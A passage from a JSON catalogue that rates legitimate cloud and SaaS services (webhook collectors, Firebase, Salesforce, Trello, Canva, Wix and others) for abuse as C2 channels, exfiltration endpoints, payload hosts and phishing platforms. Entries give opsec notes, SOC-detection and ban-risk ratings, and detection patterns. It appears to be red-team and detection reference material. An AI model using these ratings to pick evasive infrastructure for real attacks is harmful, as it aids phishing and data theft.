    "notes": "Heroku alternative with actual free web services. Deploy from Git push. Services spin down after 15min idle on free tier. Custom domains free. Good for disposable redirectors",
    "customDomain": true,
    "customDomainNotes": "Free custom domains with automatic HTTPS",
    "dataRetention": "Persistent (databases). Services: ephemeral filesystem",
    "rateLimits": "No explicit API rate limit",
    "maxFileSize": "N/A",
    "logging": "Service logs in dashboard"
  },
  {
    "name": "Webhook.site",
    "url": "https://webhook.site",
    "category": "C2 Channel",
    "provider": "Webhook.site",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "webhook.site"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [
      "webhook.site/token/*"
    ],
    "opsec": "medium",
    "opsecNotes": "Capture credentials and tokens in real-time. Zero signup. URLs are publicly accessible if discovered",
    "socDetection": "likely",
    "banRisk": "low",
    "banNotes": "No enforcement. Ephemeral URLs. Commonly used in security testing",
    "verification": "No signup required. Instant unique URL generated",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free: 1 URL at a time, 100 requests, 48hr expiry. Pro for multiple URLs and custom actions"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth required"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "webhook.site exfil",
        "url": "https://lolexfil.github.io/#tool=webhook.site%20%28instant%20HTTP/DNS%20webhook%20collector%29",
        "note": ""
      }
    ],
    "mitre": [
      "T1567.002",
      "T1102.002"
    ],
    "refs": [
      {
        "title": "Webhook.site",
        "url": "https://webhook.site"
      },
      {
        "title": "MITRE ATT&CK: T1567.004 Exfiltration Over Webhook",
        "url": "https://attack.mitre.org/techniques/T1567/004/"
      },
      {
        "title": "SANS ISC: Info-Stealer Using webhook.site to Exfiltrate Data",
        "url": "https://isc.sans.edu/diary/InfoStealer+Using+webhooksite+to+Exfiltrate+Data/28088"
      },
      {
        "title": "SecurityAffairs: APT28 Operation MacroMaze - webhook.site for C2 and Exfiltration",
        "url": "https://securityaffairs.com/188421/apt/operation-macromaze-apt28-exploits-webhooks-for-covert-data-exfiltration.html"
      },
      {
        "title": "Mattysploit: Webhook.site as C2 Redirector for Red Team",
        "url": "https://medium.com/@mattysploit/c2-redirector-usage-and-you-57364cfde409"
      }
    ],
    "detection": [
      "webhook.site/token/*",
      "dnshook.site",
      "INCLUDEPICTURE*webhook.site"
    ],
    "notes": "Zero signup real-time request capture. APT28 Operation MacroMaze: used webhook.site for C2 and data exfiltration against European targets (SecurityAffairs 2026). SANS ISC: Hazard-Token-Grabber-V2 info-stealer uses webhook.site. Also offers dnshook.site for DNS-based data bouncing/exfiltration. MITRE ATT&CK T1567.004 explicitly names webhook.site as exfil service. APT28 technique: INCLUDEPICTURE in Word docs pointing to webhook.site as tracking pixel. msedge --headless for stealthy HTML form-based exfiltration",
    "customDomain": false,
    "customDomainNotes": "N/A - webhook collector",
    "dataRetention": "48h free. 30 days Pro",
    "rateLimits": "100 req free. Unlimited Pro",
    "maxFileSize": "N/A",
    "logging": "All requests logged in real-time UI"
  },
  {
    "name": "Pipedream",
    "url": "https://pipedream.com",
    "category": "C2 Channel",
    "provider": "Pipedream",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "*.m.pipedream.net",
      "pipedream.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [
      "*.m.pipedream.net"
    ],
    "opsec": "low",
    "opsecNotes": "Serverless endpoints for C2 callbacks and credential capture. Workflow automation for chaining actions",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Automation platform. Minimal abuse monitoring",
    "verification": "Email only. GitHub/Google OAuth. No CC for free",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 100 daily invocations, 30min compute/day, 100 workflows. HTTP endpoints free"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "Google/GitHub OAuth. No enterprise SSO on free"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "Pipedream webhooks",
        "url": "https://lolexfil.github.io/#tool=Pipedream%20%28programmable%20HTTP%20webhook%20platform%29",
        "note": ""
      }
    ],
    "mitre": [
      "T1102.002",
      "T1567.002"
    ],
    "refs": [
      {
        "title": "Pipedream Pricing",
        "url": "https://pipedream.com/pricing"
      }
    ],
    "detection": [
      "*.m.pipedream.net"
    ],
    "notes": "Serverless HTTP endpoints for C2 callbacks and credential/token capture. Workflow automation can chain triggers (receive data -> forward to Slack/email/storage). Free tier generous for red team use",
    "customDomain": false,
    "customDomainNotes": "N/A - automation",
    "dataRetention": "30 days execution history free",
    "rateLimits": "100 invocations/day free",
    "maxFileSize": "5MB per execution payload",
    "logging": "Execution logs in dashboard"
  },
  {
    "name": "LinkedIn",
    "url": "https://linkedin.com",
    "category": "Phishing",
    "provider": "Microsoft",
    "signup": "email",
    "signupTime": "~5min",
    "domains": [
      "linkedin.com",
      "lnkd.in"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "lnkd.in shortlinks trusted by all email filters. InMail for targeted spearphishing. Profile impersonation for pretexting",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "LinkedIn actively removes fake profiles. Automated connection requests flagged. InMail abuse detected",
    "verification": "Email required. Phone for some features. Real identity expected (but not verified)",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free: profile, connections, messaging. InMail requires Premium ($30/mo). Sales Nav trial 30 days"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Full SAML/OIDC/SCIM on Enterprise. OAuth for API"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1598.003",
      "T1585.001"
    ],
    "refs": [
      {
        "title": "LinkedIn Premium",
        "url": "https://www.linkedin.com/premium/products/"
      }
    ],
    "detection": [
      "*.linkedin.com",
      "www.linkedin.com/messaging/*",
      "www.linkedin.com/in/*",
      "lnkd.in",
      "media.licdn.com",
      "LinkedIn InMail for spearphishing (OSINT + trusted sender)",
      "LinkedIn Smart Links abuse: www.linkedin.com/slink?code=* redirecting to phishing",
      "LinkedIn job posting lures for malware delivery (Lazarus APT Operation DreamJob)"
    ],
    "notes": "lnkd.in shortlinks universally trusted by email filters and proxies. InMail bypasses spam filters entirely. Fake profiles for social engineering. Connection requests for initial trust building. Microsoft-owned domain",
    "customDomain": false,
    "customDomainNotes": "N/A - social platform",
    "dataRetention": "Permanent",
    "rateLimits": "API: rate limited per endpoint",
    "maxFileSize": "N/A",
    "logging": "Admin analytics on Company pages"
  },
  {
    "name": "Figma",
    "url": "https://figma.com",
    "category": "Phishing",
    "provider": "Adobe",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "figma.com",
      "*.figma.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Design sharing notifications as phishing pretexts. Embed links in prototypes. Trusted Adobe-owned domain",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Design sharing is normal behavior. Minimal content moderation",
    "verification": "Email only. Google SSO. No CC for free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 3 Figma and 3 FigJam files, unlimited viewers, 30-day version history"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Organization plan. Google SSO on all plans"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1204.001"
    ],
    "refs": [
      {
        "title": "Figma Pricing",
        "url": "https://www.figma.com/pricing/"
      }
    ],
    "detection": [
      "*.figma.com",
      "www.figma.com/proto/*",
      "www.figma.com/design/*",
      "www.figma.com/file/*",
      "cdn.figma.com",
      "Figma prototype pages as phishing landing pages (fake Microsoft login)",
      "Storm-1747, Mamba, Gabagool: Figma abuse for credential phishing (ANY.RUN Oct 2025)",
      "Figma 'shared document' email invitations leading to phishing flows"
    ],
    "notes": "Sharing notifications as phishing pretexts: 'Check this design mockup'. Embed malicious links in interactive prototypes. Adobe-owned trusted domain. Mentioned in lolc2 candidates issue #6",
    "customDomain": false,
    "customDomainNotes": "N/A - design platform",
    "dataRetention": "Permanent (3 files free)",
    "rateLimits": "No public API rate limit",
    "maxFileSize": "N/A",
    "logging": "Version history 30 days free"
  },
  {
    "name": "Firebase (Standalone)",
    "url": "https://firebase.google.com",
    "category": "Cloud",
    "provider": "Google",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "*.web.app",
      "*.firebaseapp.com",
      "firebasestorage.googleapis.com"
    ],
    "trustedDomain": true,
    "domainFronting": true,
    "domainFrontingNotes": "Cloud Functions can act as C2 redirectors on *.web.app domain. Hosting rewrites to Functions",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 1
    },
    "apiEndpoints": [
      "firebasestorage.googleapis.com/*",
      "firebaseio.com/*"
    ],
    "opsec": "low",
    "opsecNotes": "*.web.app and *.firebaseapp.com are trusted Google domains. Hosting deploys in seconds. Realtime DB as C2 backend. Storage for payloads",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Google abuse team handles reports but Firebase phishing pages can persist for days",
    "verification": "Google account only. No CC for Spark (free) plan",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Spark plan free: 10GB hosting, 1GB storage, 50k/day reads Firestore, 20k/day writes, 50k auth/mo"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "Google OAuth for console. Firebase Auth supports SAML/OIDC for app users"
    },
    "knownC2": [
      {
        "name": "firec2",
        "url": "https://github.com/s0ld13rr/firec2"
      }
    ],
    "exfilTools": [],
    "mitre": [
      "T1583.006",
      "T1102.002",
      "T1566.002",
      "T1567.002"
    ],
    "refs": [
      {
        "title": "Firebase Pricing",
        "url": "https://firebase.google.com/pricing"
      },
      {
        "title": "lolc2 - Firebase",
        "url": "https://lolc2.github.io"
      }
    ],
    "detection": [
      "firebasestorage.googleapis.com/*",
      "*.firebaseio.com/*"
    ],
    "notes": "1 lolc2 C2 framework (firec2). *.web.app hosting deploys in seconds with firebase deploy. Realtime Database as C2 backend. Storage for payload hosting. Firestore for structured C2 data. All on trusted Google domain",
    "customDomain": true,
    "customDomainNotes": "Custom domains on Firebase Hosting free",
    "dataRetention": "Permanent (Firestore, Storage). Hosting deploys immutable",
    "rateLimits": "Firestore: 50k reads/day free. Functions: rate varies",
    "maxFileSize": "5MB per document (Firestore). 5GB Storage free",
    "logging": "Firebase console analytics. Cloud Logging integration",
    "lolc2Url": "https://lolc2.github.io/#firebase"
  },
  {
    "name": "Salesforce",
    "url": "https://salesforce.com",
    "category": "Business App",
    "provider": "Salesforce",
    "signup": "dev",
    "signupTime": "~5min",
    "domains": [
      "*.force.com",
      "*.salesforce.com",
      "*.my.salesforce.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "*.salesforce.com/services/data/*"
    ],
    "opsec": "low",
    "opsecNotes": "Free developer edition forever. Connected app abuse for persistent API access. Apex triggers for automation",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Developer edition is legitimate. API testing expected",
    "verification": "Email for developer signup. No CC. No phone",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Developer Edition: free forever, 5MB data, 20MB file storage, full API, Apex, Lightning"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Full SAML SP/IdP. OIDC. SCIM. Connected App OAuth. MFA enforced 2024+"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1528",
      "T1567.002"
    ],
    "refs": [
      {
        "title": "Salesforce Developer Edition",
        "url": "https://developer.salesforce.com/signup"
      },
      {
        "title": "Salesforce SSO/SAML",
        "url": "https://help.salesforce.com/s/articleView?id=sf.sso_saml.htm"
      }
    ],
    "detection": [
      "*.salesforce.com",
      "*.force.com",
      "*.my.salesforce.com",
      "*.lightning.force.com",
      "*.visualforce.com",
      "*.site.com",
      "*.my.site.com",
      "login.salesforce.com",
      "*.salesforce.com/services/data/v*/query/*",
      "*.salesforce.com/services/oauth2/token",
      "Setup Audit Trail: ConnectedApp.Created, Login anomalies",
      "OAuth token abuse: fake Data Loader connected apps (UNC6040 vishing)",
      "Gainsight OAuth token compromise (ShinyHunters Nov 2025)",
      "AuraInspector mass-scanning of Experience Cloud instances (ShinyHunters 2026)",
      "Salesforce redirect abuse in phishing chains (Google Careers impersonation)",
      "FBI IOCs: UNC6040/UNC6395 Salesforce supply chain campaign (Sept 2025)"
    ],
    "notes": "Free developer edition forever with full API access. Connected app abuse for persistent OAuth access post-compromise. Apex triggers for automated actions. Community sites for phishing pages on trusted *.force.com domain",
    "customDomain": true,
    "customDomainNotes": "Custom domains on My Domain (free)",
    "dataRetention": "Permanent (5MB data, 20MB files)",
    "rateLimits": "API: 15k calls/day (developer)",
    "maxFileSize": "2GB per file",
    "logging": "Setup Audit Trail, Event Monitoring (Shield add-on)"
  },
  {
    "name": "ServiceNow",
    "url": "https://servicenow.com",
    "category": "Business App",
    "provider": "ServiceNow",
    "signup": "dev",
    "signupTime": "~10min",
    "domains": [
      "*.service-now.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "*.service-now.com/api/*"
    ],
    "opsec": "low",
    "opsecNotes": "Free developer instance. ITSM workflow abuse. Knowledge base data exposure",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Developer instances are legitimate. Reset every 10 days if inactive",
    "verification": "Email + ServiceNow developer account",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Personal Developer Instance: free, full platform, resets if inactive 10 days"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Full SAML/OIDC/SCIM. Multi-provider SSO. OAuth for API"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1530"
    ],
    "refs": [
      {
        "title": "ServiceNow Developer",
        "url": "https://developer.servicenow.com/dev.do"
      },
      {
        "title": "ServiceNow SAML",
        "url": "https://docs.servicenow.com/bundle/latest-platform-security/page/integrate/saml/concept/c_SAML2.0.html"
      }
    ],
    "detection": [
      "*.service-now.com",
      "*.servicenow.com",
      "*.service-now.com/api/*",
      "*.service-now.com/nav_to.do*",
      "*.service-now.com/login.do",
      "*.service-now.com/sys_attachment.do*",
      "developer.servicenow.com",
      "ServiceNow Audit: sys_audit table for login/data access anomalies",
      "Phishing: ServiceNow ticket notification impersonation"
    ],
    "notes": "Free developer instance with full platform access. Test ITSM workflow abuse, knowledge base data exposure, ACL bypass. Instance resets after 10 days of inactivity",
    "customDomain": false,
    "customDomainNotes": "N/A - ITSM",
    "dataRetention": "Instance resets after 10 days inactive (dev)",
    "rateLimits": "API: no hard limit stated",
    "maxFileSize": "N/A",
    "logging": "System logs, Transaction logs"
  },
  {
    "name": "Trello",
    "url": "https://trello.com",
    "category": "Business App",
    "provider": "Atlassian",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "trello.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "api.trello.com/*"
    ],
    "opsec": "low",
    "opsecNotes": "Board invite notifications for phishing. Attachment hosting. API for data exfil",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Board sharing is normal behavior. API rarely monitored",
    "verification": "Email (Atlassian account). No CC for free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: unlimited boards, 10 boards/workspace, 10MB attachments, 250 automations/mo"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM via Atlassian Access. OAuth for API/Power-Ups"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1567.002"
    ],
    "refs": [
      {
        "title": "Trello Pricing",
        "url": "https://trello.com/pricing"
      },
      {
        "title": "Trello API",
        "url": "https://developer.atlassian.com/cloud/trello/"
      }
    ],
    "detection": [
      "trello.com",
      "*.trello.com",
      "api.trello.com/1/*",
      "api.trello.com/1/boards/*",
      "api.trello.com/1/cards/*",
      "trello-attachments.s3.amazonaws.com",
      "Trello public boards for C2 dead drops (card descriptions/comments)",
      "Trello attachment URLs for payload hosting (S3-backed)"
    ],
    "notes": "Board invite notifications for phishing pretexts. Card attachments for payload hosting. API for automated data exfil. Trusted Atlassian domain",
    "customDomain": false,
    "customDomainNotes": "N/A - kanban",
    "dataRetention": "Permanent",
    "rateLimits": "API: 100 req/10s per token",
    "maxFileSize": "10MB per attachment free",
    "logging": "Audit log on Enterprise",
    "lolc2Url": "https://lolc2.github.io/#trello"
  },
  {
    "name": "Box",
    "url": "https://box.com",
    "category": "Storage",
    "provider": "Box",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "*.box.com",
      "*.app.box.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "api.box.com/*"
    ],
    "opsec": "low",
    "opsecNotes": "Trusted enterprise domain. Share notifications for phishing. API for automation",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Enterprise file sharing. Minimal content moderation on free tier",
    "verification": "Email only. CC for Business plans",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 10GB storage, 250MB file size limit, Business trial 14 days"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Full SAML/OIDC/SCIM. JWT app auth. OAuth for API"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "rclone",
        "url": "https://lolexfil.github.io/#tool=rclone",
        "note": ""
      },
      {
        "name": "duplicati",
        "url": "https://lolexfil.github.io/#tool=duplicati",
        "note": ""
      },
      {
        "name": "Cyberduck",
        "url": "https://lolexfil.github.io/#tool=Cyberduck",
        "note": ""
      }
    ],
    "mitre": [
      "T1567.002",
      "T1566.002"
    ],
    "refs": [
      {
        "title": "Box Pricing",
        "url": "https://www.box.com/pricing"
      },
      {
        "title": "Box SSO",
        "url": "https://support.box.com/hc/en-us/articles/360043696514-Setting-Up-Single-Sign-On-SSO-for-Your-Enterprise"
      },
      {
        "title": "Box API",
        "url": "https://developer.box.com/"
      },
      {
        "title": "lolexfil",
        "url": "https://lolexfil.github.io"
      }
    ],
    "detection": [
      "*.box.com",
      "*.box.net",
      "api.box.com",
      "api.box.com/2.0/*",
      "app.box.com/s/*",
      "dl.boxcloud.com",
      "upload.box.com",
      "Box shared links (app.box.com/s/*) for payload delivery",
      "Box API: bulk download/upload patterns indicating exfiltration",
      "IBM X-Force: identity-pivot chains involving Box in SaaS attacks (2025)"
    ],
    "notes": "10GB free. Enterprise-trusted domain. Share notifications for phishing. Full API for automation. rclone exfil target",
    "customDomain": false,
    "customDomainNotes": "N/A - file storage",
    "dataRetention": "Permanent (10GB free)",
    "rateLimits": "API: 1000 req/min",
    "maxFileSize": "250MB per file free. 5GB on Business",
    "logging": "Admin Events API on Business+"
  },
  {
    "name": "Canva",
    "url": "https://canva.com",
    "category": "Phishing",
    "provider": "Canva",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "www.canva.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Design shareable phishing materials. Share notifications as pretexts",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Design sharing is normal. Minimal content moderation",
    "verification": "Email only. Google SSO. No CC for free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free: 5GB storage, 250k templates, Pro trial 30 days, Teams trial 30 days"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Enterprise. Google/Microsoft SSO on all plans"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002"
    ],
    "refs": [
      {
        "title": "Canva Pricing",
        "url": "https://www.canva.com/pricing/"
      },
      {
        "title": "Canva SSO",
        "url": "https://www.canva.com/help/sso/"
      }
    ],
    "detection": [
      "*.canva.com",
      "www.canva.com/design/*",
      "www.canva.com/design/*/view",
      "export-download.canva.com",
      "media-private.canva.com",
      "Canva design URLs as phishing stepping stones (redirect to credential harvesting)",
      "Canva + Cloudflare Turnstile + fake Microsoft login chain (Abnormal AI 2025)",
      "Canva pages with 'View Complete Document' button linking to external domains",
      "Sublime Security: Canva abuse for ScreenConnect malware delivery via DocuSign impersonation",
      "Cofense: Canva ~9% of all online document hosting services abused in 2024 credential phishing"
    ],
    "notes": "Design shareable phishing materials and PDFs. Share notifications as pretexts. Trusted brand that bypasses email filters",
    "customDomain": false,
    "customDomainNotes": "N/A - design platform",
    "dataRetention": "Permanent",
    "rateLimits": "No public API rate limits",
    "maxFileSize": "N/A",
    "logging": "No audit logs"
  },
  {
    "name": "Typeform",
    "url": "https://typeform.com",
    "category": "Phishing",
    "provider": "Typeform",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "*.typeform.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Professional-looking forms for credential harvesting. Webhooks for real-time capture",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Form submissions not monitored for credential harvesting",
    "verification": "Email only. No CC for free tier",
    "trust": "medium",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 10 responses/mo, 10 questions/form. Plus trial available"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "Google SSO. No enterprise SAML"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1598.003"
    ],
    "refs": [
      {
        "title": "Typeform Pricing",
        "url": "https://www.typeform.com/pricing/"
      }
    ],
    "detection": [
      "*.typeform.com",
      "form.typeform.com",
      "*.typeform.com/to/*",
      "admin.typeform.com",
      "api.typeform.com",
      "Phishing: Typeform surveys as credential harvesting forms",
      "Typeform webhook integrations for exfiltrating submitted data"
    ],
    "notes": "Professional forms for credential harvesting. Webhooks for real-time capture. Custom thank-you pages for payload redirect. Trusted domain",
    "customDomain": false,
    "customDomainNotes": "N/A - form builder",
    "dataRetention": "Permanent (10 responses/mo free)",
    "rateLimits": "No public API rate limit",
    "maxFileSize": "N/A",
    "logging": "Response analytics. Webhook integrations"
  },
  {
    "name": "Wix",
    "url": "https://wix.com",
    "category": "Website Builder",
    "provider": "Wix",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "*.wixsite.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "WYSIWYG phishing pages on trusted domain",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "Wix moderates content. Phishing sites removed on report",
    "verification": "Email only. No CC for free",
    "trust": "medium",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free: Wix branding, 500MB storage. Custom domain requires paid plan"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "Google/Facebook login. No enterprise SSO"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1583.006"
    ],
    "refs": [
      {
        "title": "Wix Pricing",
        "url": "https://www.wix.com/upgrade/website"
      }
    ],
    "detection": [
      "*.wixsite.com",
      "*.wix.com",
      "*.wixstatic.com",
      "editor.wix.com",
      "manage.wix.com",
      "static.parastorage.com",
      "Phishing pages hosted on *.wixsite.com free subdomains",
      "Wix ADI for rapid phishing site generation"
    ],
    "notes": "WYSIWYG phishing page builder. Trusted domain. Free hosting. Sites may be removed on abuse report",
    "customDomain": true,
    "customDomainNotes": "Custom domains on paid plans. Free: *.wixsite.com",
    "dataRetention": "Permanent (500MB storage free)",
    "rateLimits": "No explicit API limits",
    "maxFileSize": "N/A",
    "logging": "Analytics on paid plans"
  },
  {
    "name": "WordPress.com",
    "url": "https://wordpress.com",
    "category": "Website Builder",
    "provider": "Automattic",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "*.wordpress.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 1
    },
    "apiEndpoints": [
      "public-api.wordpress.com/*"
    ],
    "opsec": "low",
    "opsecNotes": "REST API for C2. Custom themes for credential pages. Universally trusted domain",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "Automattic has abuse team. Sites removed on DMCA/phishing reports",
    "verification": "Email only. No CC for free subdomain",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 1GB storage, *.wordpress.com subdomain. Custom domain on paid plans"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "SAML on WordPress.com Business+. OAuth for REST API"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1583.006",
      "T1102",
      "T1566.002"
    ],
    "refs": [
      {
        "title": "WordPress.com Pricing",
        "url": "https://wordpress.com/pricing/"
      }
    ],
    "detection": [
      "*.wordpress.com",
      "*.wp.com",
      "public-api.wordpress.com",
      "s0.wp.com",
      "s1.wp.com",
      "s2.wp.com",
      "*.files.wordpress.com",
      "Phishing/malware staging on free *.wordpress.com blogs",
      "WordPress.com REST API for programmatic content publishing"
    ],
    "notes": "REST API usable for C2 dead drops. Custom themes for credential harvesting pages. *.wordpress.com universally trusted. Sites removed on abuse report",
    "customDomain": true,
    "customDomainNotes": "Custom domains on paid plans. Free: *.wordpress.com",
    "dataRetention": "Permanent (1GB storage free)",
    "rateLimits": "REST API: rate limited",
    "maxFileSize": "No per-file limit stated",
    "logging": "Jetpack stats. Admin activity log"
  },
  {
    "name": "Webflow",
    "url": "https://webflow.com",
    "category": "Website Builder",
    "provider": "Webflow",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "*.webflow.io"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Professional looking phishing pages. Form submissions for credential capture",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Minimal abuse enforcement",
    "verification": "Email only. No CC for free",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 2 projects, 1GB bandwidth, *.webflow.io subdomain"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Enterprise. Google SSO on all plans"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1583.006",
      "T1566.002"
    ],
